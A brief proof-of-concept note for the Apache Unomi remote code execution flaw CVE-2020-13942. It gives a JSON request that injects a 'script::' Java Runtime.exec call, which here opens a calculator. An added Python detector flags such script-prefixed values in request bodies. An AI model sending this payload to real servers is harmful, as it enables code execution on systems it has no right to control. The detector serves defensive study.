# CVE-2020-13942 Apache Unomi Remote Code Execution

PoC:

```json
{"filters":[{"id" : "pyn3rd","filters": [{"condition": {"parameterValues": {"pyn3rd": "script::Runtime.getRuntime().exec('open -a Calculator')"},"type":"profilePropertyCondition"}}]}],"sessionId": "pyn3rd"}
```

![](/static/lingjiao/media/16097302096726/16097302307813.jpg)
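For detection, the request shape above can be matched in captured request bodies by looking for `script::`-prefixed strings inside a `parameterValues` object. The following is an added example, not part of the original post or of Apache Unomi; the function names, the sample bodies and the choice to scope the match to `parameterValues` are assumptions drawn from the PoC's structure.

```python
import json

SCRIPT_PREFIX = "script::"  # prefix seen in the PoC's parameterValues entry


def find_script_values(node, path="$", inside_params=False):
    """Walk parsed JSON and return (json_path, value) for every string that
    sits under a parameterValues object and starts with the script:: prefix."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            scoped = inside_params or key == "parameterValues"
            hits += find_script_values(value, f"{path}.{key}", scoped)
    elif isinstance(node, list):
        for index, value in enumerate(node):
            hits += find_script_values(value, f"{path}[{index}]", inside_params)
    elif isinstance(node, str) and inside_params:
        # Deliberately broad: ignore leading whitespace and letter case.
        if node.strip().lower().startswith(SCRIPT_PREFIX):
            hits.append((path, node))
    return hits


def inspect_body(raw):
    """Return findings for one request body. If the body is not valid JSON,
    fall back to a plain substring check so malformed input is not missed."""
    try:
        doc = json.loads(raw)
    except (ValueError, TypeError):
        marker_present = isinstance(raw, str) and SCRIPT_PREFIX in raw.lower()
        return [("<raw body>", "script:: in unparseable JSON")] if marker_present else []
    return find_script_values(doc)


# Constructed sample bodies (not captured traffic); the expression is a placeholder.
BENIGN = ('{"filters":[{"id":"demo","filters":[{"condition":{"parameterValues":'
          '{"propertyName":"properties.age","comparisonOperator":"greaterThan",'
          '"propertyValueInteger":30},"type":"profilePropertyCondition"}}]}],'
          '"sessionId":"demo"}')
SUSPECT = ('{"filters":[{"id":"demo","filters":[{"condition":{"parameterValues":'
           '{"demo":"script::<expression>"},"type":"profilePropertyCondition"}}]}],'
           '"sessionId":"demo"}')

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, inspect_body(body))
```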

ref:

https://twitter.com/pyn3rd/status/1328920545442680837
